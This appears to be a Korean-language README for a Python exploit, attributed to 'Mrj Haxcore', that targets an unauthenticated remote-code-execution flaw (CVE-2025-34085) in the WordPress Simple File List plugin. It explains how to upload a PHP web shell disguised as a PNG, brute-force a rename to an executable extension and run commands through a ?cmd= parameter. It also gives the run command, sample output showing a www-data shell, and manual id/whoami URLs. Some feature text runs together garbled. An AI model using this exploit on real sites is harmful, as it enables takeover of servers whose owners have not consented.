
Simple File List – 인증되지 않은 RCE 익스플로잇 (CVE-2025-34085)
⚠️ 익스플로잇 코드 작성자: Mrj Haxcore
WordPress Simple File List 플러그인(<= 4.2.3)에 대한 완전히 작동하는 Python 익스플로잇입니다. 이 플러그인은 안전하지 않은 파일 업로드 및 이름 변경 로직으로 인해 인증되지 않은 원격 코드 실행(RCE) 취약점이 있습니다.
simple-file-list).png로 위장한 PHP 파일을 업로드한 후, 이를 .php로 이름을 변경하고 임의 코드를 실행할 수 있습니다.multipart/form-data 빌더 (415 우회).php, .php5, .phtml 등에 대한 이름 변경 무차별 대입?cmd=를 통한 명령 실행�PNG 쓰레기 없음)python3 simple.py https://target.site
[+] Uploading shell as 8dkls0qp.png...
[+] Upload successful.
[+] Trying to rename to: 8dkls0qp.php...
[+] Rename successful: 8dkls0qp.php
[+] Triggering shell: https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=id
[+] Shell output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Manual Visit
https://target.site/wp-content/uploads/simple-file-list/8dkls0qp.php?cmd=whoami